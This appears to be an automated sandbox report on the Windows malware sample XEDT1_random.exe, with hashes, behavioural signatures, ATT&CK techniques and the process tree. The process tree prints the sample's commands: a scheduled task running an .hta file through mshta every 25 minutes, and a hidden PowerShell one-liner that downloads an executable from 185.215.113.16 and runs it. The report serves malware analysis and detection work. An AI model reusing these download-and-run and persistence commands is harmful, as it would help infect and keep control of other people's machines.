Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
12/02/2025, 20:56
Static task
static1
Behavioral task
behavioral1
Sample
XEDT1_random.exe
Resource
win7-20250207-en
General
-
Target
XEDT1_random.exe
-
Size
938KB
-
MD5
6bf55c81166c49ca51a9f3224fe8a8f3
-
SHA1
efd7bf8fe47a45f024bec4542e087d3c6361bb06
-
SHA256
f1c3f0ad49ff3fb5241d62695254f26a734123153946fa012283ad0993665e63
-
SHA512
cc056102f57ab916b57dff8cfffa87684e3dfc20d695d6730e044dffa36c2a63f6864b5e5196d2cab8067f9b6b152f537f6b82dbaf23582e580d393c98b7b876
-
SSDEEP
24576:OqDEvCTbMWu7rQYlBQcBiT6rprG8aell:OTvC/MTQYxsWR7ael
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 1248 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1248 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 43 1668 Process not Found 8 1248 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3296967594-3563063956-581523229-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XEDT1_random.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3412 MicrosoftEdgeUpdate.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3052 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1248 powershell.exe 1248 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1248 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4884 XEDT1_random.exe 4884 XEDT1_random.exe 4884 XEDT1_random.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4884 XEDT1_random.exe 4884 XEDT1_random.exe 4884 XEDT1_random.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4884 wrote to memory of 4204 4884 XEDT1_random.exe 88 PID 4884 wrote to memory of 4204 4884 XEDT1_random.exe 88 PID 4884 wrote to memory of 4204 4884 XEDT1_random.exe 88 PID 4884 wrote to memory of 2524 4884 XEDT1_random.exe 89 PID 4884 wrote to memory of 2524 4884 XEDT1_random.exe 89 PID 4884 wrote to memory of 2524 4884 XEDT1_random.exe 89 PID 4204 wrote to memory of 3052 4204 cmd.exe 91 PID 4204 wrote to memory of 3052 4204 cmd.exe 91 PID 4204 wrote to memory of 3052 4204 cmd.exe 91 PID 2524 wrote to memory of 1248 2524 mshta.exe 93 PID 2524 wrote to memory of 1248 2524 mshta.exe 93 PID 2524 wrote to memory of 1248 2524 mshta.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\XEDT1_random.exe"C:\Users\Admin\AppData\Local\Temp\XEDT1_random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn hQCdBmaEzUv /tr "mshta C:\Users\Admin\AppData\Local\Temp\uiSJuyR6T.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn hQCdBmaEzUv /tr "mshta C:\Users\Admin\AppData\Local\Temp\uiSJuyR6T.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3052
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\uiSJuyR6T.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NMZASWD8RW7OO2WC5WH6SDU0TVHBZZWB.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTk5QUJDRDMtRDY2Ny00OEJFLTgxRTUtNzRCM0U0QjJFNUY3fSIgdXNlcmlkPSJ7NUIzOTg0RTctREI2QS00RDgxLUIyRkUtRDMwMDk1NjdBMjhFfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RjYwMDM5RUUtOTJGOS00OTNELUIxNEMtNEJFRDRFREUwNTYzfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODIxNjkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1MzE4NTEwMTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MjIyMzczMDU1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3412
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
726B
MD5d8b73f85f50e827aa878999dfc1bf965
SHA1041c4df7d716aac1076b87a2961a9be701648a12
SHA256c44b2edc18ce174a274eb5142fcf2d64ff95cf068d34e0bdec23281863b79c66
SHA51288fefbc39598d6847fae6cfc30f36884c0ee4124c91551e46a3fc503b09485e9c17c06bf4743fa2f02f2fa214107f76d022806f3460cacaed14c1cf42c853619